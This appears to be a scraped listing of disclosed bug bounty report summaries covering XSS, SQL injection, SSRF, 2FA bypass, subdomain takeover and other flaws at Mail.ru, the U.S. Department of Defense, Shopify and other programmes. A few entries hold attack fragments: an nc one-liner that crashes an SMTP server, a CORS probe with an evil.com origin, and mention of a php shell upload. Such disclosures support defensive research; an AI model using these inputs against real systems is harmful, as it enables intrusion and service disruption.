Mail.ru: Пользователь может изменить номер телефона в профиле без СМС подтверждения

SMS code for phone number change in zakazaka.ru was not sufficiently protected against bruteforce...

Mail.ru: Брутфорс sms кода подтверждения для смены номера телефона в аккаунте LootDog.

SMS code for phone number change in lootdog.io was not sufficiently protected against bruteforce...

U.S. Dept Of Defense: Stored XSS at ██████userprofile.aspx

Summary: Stored XSS vulnerability exists at ██████████userprofile.aspx under "say something about yourself...". XSS can be used for a variety of attacks. Impact XSS can be used to steal cookies, password or to run arbitrary code in the victim's browser. Step-by-step Reproduction Instructions 1...

Mail.ru: Redmin API Key Exposed In GIthub

Sensitive application configuration data related to tracker.ucs.ru was leaked on github.com...

Mail.ru: Reflected XSS on http://info.ucs.ru/settings/check/

Reflected XSS due to unsafe usage of POST parameter in info.ucs.ru...

Mail.ru: Blind SSRF on http://info.ucs.ru/settings/check/

Blind SSRF in info.ucs.ru...

Mail.ru: [self?] XSS в адресе пользователя [sbermarket.ru]

Stored self-XSS via delivery address in sbermarket.ru i die ███████████████████████████ ███████▀▀▀░░░░░░░▀▀▀███████ ████▀░░░░░░░░░░░░░░░░░▀████ ███│░░░░░░░░░░░░░░░░░░░│███ ██▌│░░░░░░░░░░░░░░░░░░░│▐██ ██░└┐░░░░░░░░░░░░░░░░░┌┘░██ ██░░└┐░░░░░░░░░░░░░░░┌┘░░██ ██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██...

Mail.ru: Логи/sql запросы на http://mx36.ucs.ru/ и reflected XSS.

Sensitive application information disclosure and stored XSS via log files on mx36.ucs.ru...

Mail.ru: SQL Injection at https://lite.r-keeper.ru/site_api/clients/derision/?lang=ru

SQL Injections in lite.r-keeper.ru due to unsafe usage of URI parameters...

Mail.ru: SQL Injection at https://lite.r-keeper.ru/site_api/localize/translate/rklscommon/ru

SQL Injection in lite.r-keeper.ru due to unsafe usage of PATH from GET Request...

PlayStation: Reflected XSS on transact.playstation.com using postMessage from the opening window

Report Summary: When transact.playstation.com loads it handles messages received from postMessage in the receiveMessageFromTransactClientService method. The only validation that is performed is to ensure that the referrer and origin match: javascript receiveMessageFromTransactClientService:...

Mail.ru: SSRF at jira.plazius.ru - CVE-2019-8451

SSRF via CVE-2019-8451 in jira.plazius.ru due to unpatched Jira version...

Mail.ru: xss on [storehouse5.ucs.ru]

Reflected XSS via POST parameter in storehouse5.ucs.ru I die ███████████████████████████ ███████▀▀▀░░░░░░░▀▀▀███████ ████▀░░░░░░░░░░░░░░░░░▀████ ███│░░░░░░░░░░░░░░░░░░░│███ ██▌│░░░░░░░░░░░░░░░░░░░│▐██ ██░└┐░░░░░░░░░░░░░░░░░┌┘░██ ██░░└┐░░░░░░░░░░░░░░░┌┘░░██ ██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██...

Open-Xchange: Buffer over read from `smtp_command_parse_parameters`

Function smtpcommandparseparameters calls uniutf8getcharn with length parameter sizetp - parser-endwhen the parameter should be sizetparser-end - p To reproduce, send as input to the smtp server 8191 spaces followed by the beginning of one unicode character printf ' %8190s\xdc' " " | nc localhost...

Mail.ru: Stored XSS that allow an attacker to read victim mailboxes contacts in mail.ru and my.com application

Mail.ru Mail IOS app was vulnerable to local files access on some iOS versions due to cross-application scripting if malcrafted SVG attachment is viewed by user Write-up is here...

U.S. Dept Of Defense: Unrestricted File Upload Leads to XSS & Potential RCE

Summary: Unrestricted file upload at████████/request?openform. When the user wants to upload a file the app allows the user to upload a HTML file leading to stored XSS and creation of a simple php script. A user can upload the HTML file and trigger XSS and trigger potential RCE with php shell...

U.S. Dept Of Defense: PII Leak (such as CAC User ID) at https://████████/pages/login.aspx

Summary: An attacker can create an account on https://█████/pages/login.aspx and gain access to a wealth of PII for practically every member that is registered on the website. This information that the attacker has access to includes usernames, CAC User ID's, e-mail addresses, telephone numbers,...

U.S. Dept Of Defense: Subdomain takeover of ████

Summary: I was able to claim the subdomain: ████ using Microsoft Azure CDN profiles Description: Impact Platforms Affected: Subdomain Azure CDN Step-by-step Reproduction Instructions 1. Using dig, I was able to determine that the subdomain '███████' was vulnerable to takeover. The record showed...

Rocket.Chat: XSS leads to RCE on the RocketChat desktop client.

Summary: It is possible to call electron.shell.openExternal from javascript inside a server webview. Description: The document onclick handler allows executing electron.shell.openExternal by crafting an attacker-controlled link and dispatching a click event on it after overwriting Regex.test...

Rocket.Chat: XSS in message attachment fileds.

NOTE! Thanks for submitting a report! Please replace all the square sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty, so be sure to take your time filling out the report! Summary: There is a...

Kubernetes: Man in the middle leading to root privilege escalation using hostNetwork=true (CAP_NET_RAW considered harmful)

Summary: CAPNETRAW capability is still included by default in K8S, leading to yet another attack. An attacker gaining access to a hostNetwork=true container with CAPNETRAW capability can listen to all the traffic going through the host and inject arbitrary traffic, allowing to tamper with most...

Ruby on Rails: Untrusted users able to run pending migrations in production

Untrusted users able to run pending migrations in production There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed an untrusted user to run any pending migrations on a Rails app running in production. This vulnerability has been assigned the CVE identifier CVE-2020-XXXX...

Shopify: Password reset link not expired at Stocky App

You can use password reset link to reset password multiple times. Steps: 1. Go to https://stocky.shopifyapps.com/users/forgottenpassword and Send the password reset link to your email. if this page doesn't appear you should add login details via this https://stocky.shopifyapps.com/preferences/use...

Open-Xchange: Out of memory with combination of `test_config_set` and `test_config_reload`

Running testsuite on input require "vnd.dovecot.testsuite"; require "variables"; require "editheader"; testset "message" "$message"; test "Default protected" if not exists "received" testfail "received header did not exist in the first place"; testconfigset "sieveeditheaderprotected" "Àubject...

Ruby: DRb denial of service vulnerability

It is possible to crash the DRb server by providing malformed input. By following DRb example https://ruby-doc.org/stdlib-2.7.0/libdoc/drb/rdoc/DRb.htmlmodule-DRb-label-Server+code it was created the simple server and client code attached: drbserver.rb drbclient.rb client code was modified to...

Shopify: GraphQL AdminGenerateSessionPayload is leaked to staff with no permission

@hiffley reported the ability to generate app tokens via the adminGenerateSession mutation in Shopify Admin, as a staff member with no permissions. This allowed for accessing a small subset of installed apps that are using this new flow including Shopify Email. Access was limited to the current...

Mail.ru: Source code and internal credentials disclosure

Sensitive application configuration data disclose on registry.infra.mail.ru...

Mail.ru: Reflected XSS in "keywords" parameter at "https://sbermarket.ru/metro/search"

Reflected XSS via GET parameter in sbermarket.ru...

Mail.ru: Открытая админка 1C эмулятора

Staging testing versions of 1C-emulator and Adminer interfaces was available from external network without authentication on geekbrains.ru. This interfaces had no access to production data...

Node.js third-party modules: Arbitrary code execution via untrusted schemas in ajv

I would like to report an arbitrary code execution vulnerability in ajv. It allows to execute arbitrary code if an attacker-controlled schema is passed to the module. I have confirmed that this should be treated as a security issue. I labeled this as low because this is an unusual scenario, usual...

Nintendo: [3DS][SSL][SDK] Unchecked number of audio channels in Mobiclip SDK leads to RCE in eShop movie player

Affected Systems - Platform: New Nintendo 3DS - Region: ALL - System version: 11.13 latest at the time of writing Description The Mobiclip SDK used for parsing moflex videos does not check the number of audio channels in an audio stream. This leads to a miscalculation of free space remaining in a...

Greenhouse.io: SSH port on store.greenhouse.io is vulnerable to brute force attacks

Open SSH port found on third party vendor...

Visma Public: Stored XSS in eaccounting.stage.vismaonline.com

The security researcher was able to find a Stored XSS Cross-site scripting vulnerability on the eaccounting.stage.vismaonline.com domain. This causes arbitrary javascript execution on the victim's browser. The severity of this vulnerability has been evaluated as medium...

Glassdoor: 2FA bypass by sending blank code

Summary: █████████. This is a failure in null check of the entered code. In simple terms, the 2FA while logging in can be bypassed by sending a blank code. This could be because of incorrect comparison of entered code with true code. A pre-validation may be null check before comparing the codes...

Zivver: XXE Injection through SVG image upload leads to SSRF

While uploading photos to my profile picture, I noticed that if I included an svg image, your server would parse and upload it to my profile. Through this, I explored more and found that this same functionality was also vulnerable to an XXE attack, where I could define my own entities, and your...

Mail.ru: [smena.samokat.ru] Predictable JWT secret

Default secret value was used for JWT generation by smena.samokat.ru What can go wrong if JWT HS256 secret value is secret 😀...

Mail.ru: Получение гарантированного дохода и бонусов без фактического исполнения заказов, при этом используя аккаунты не существующих людей.

Reported demonstrated a possibility to bypass an anti-fraud protection in Citymobil taxi service...

Nextcloud: Reflected XSS when renaming a file with a vulnerable name which results in an error

Hi, It looks like Nextcloud team will accept the XSS protected by the CSP. Report 896511 Here is another XSS. 1. Rename an existing filename to .jpg. 2. Anyone tries to rename this .jpg with an invalid filename, like add a "" in it, will trigger the XSS attack. 3. Need bypass the CSP. Thanks...

Nextcloud: XSS in image metadata field

Hi, Will you confirm the XSS vulnerability blocked by the CSP? On Nextcloud 19.0.0 1. Upload the PoC.jpg 2. Check the PoC.jpg metadata 3. Need bypass the CSP to trigger it Impact Cross-Site Scripting...

Monero: Misconfiguration in build environment allows DLL preloading attack

Summary: monero-wallet-gui.exe tries to dynamically load some dynamic link librariesDLL which are not present in the applications directory, so LoadLibraryA system-call will search other directories such as Windows root and %PATH% for them. An attacker can gain arbitrary code execution if he/she...

GitHub Security Lab: Java: CWE-297 Insecure JavaMail SSL configuration

This bug was reported directly to GitHub Security Lab...

GitHub Security Lab: CodeQL query for SpEL injections

This bug was reported directly to GitHub Security Lab...

U.S. Dept Of Defense: (CORS) Cross-origin resource sharing misconfiguration

Description: Affected website: https://██████████/wp-json Impact Step-by-step Reproduction : 1. Send this request: javascript GET /wp-json HTTP/1.1 Host: █████████ Connection: close Origin: http://evil.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Windows NT...

Blueboard: path traversal vulnerability adding /████████ after ████████ and skip ██████ page.

This report has brought to light a workaround to scheduling calls with our sales team, that would allow anyone to do so without going through our dedicated marketing website's flow...

Facebook: Facebook - Reputation Sync For #267890541047618

This bug was reported directly to Facebook...

Engel & Völkers Technology GmbH: [service.engelvoelkers.com] XSS in /video/id

Summary: The YouTube video page at https://service.engelvoelkers.com/video/id/ is vulnerable to reflected XSS attacks. Description: A dynamic part of the URL is printed to the page without proper encoding, causing a reflected XSS vulnerability. Steps to reproduce Visit the following link:...

GSA Bounty: Limited LFI

Summary: Due to improper parameter sensitization local file inclusion is possible. LFI is limited as we were not able to truncate the end of string. Description: Application root is located at /var/www/dashboard/new/public Due to URL Manipulation we are able to raed file from...

8x8: DOM Based XSS at docs.8x8.com

A domain for marketing documentation contained a DOM based XSS due to evaluation and rendering of window.location.href in the related javascript...

h1-ctf: [h1-2006 2020] Bounty payments are done !

Read more here! https://github.com/Louzogh/CTF-Writeup/blob/master/2020/H1-2006-CTF/README.md Hey, I've published my write-up at : https://github.com/Louzogh/CTF-Writeup/blob/master/2020/H1-2006-CTF/README.md Enjoy 😅...

h1-ctf: [H1-2006 2020] Bounty Pay CTF challenge

H1-2006 2020 Bounty Pay CTF challenge Hi there! This is my H1-2006 CTF writeup submission. First of all, thanks for the great challenge! This was my first H1 CTF that I played. I really enjoyed doing it and I learned new things solving this challenge. In my case, it was the demonstration that I...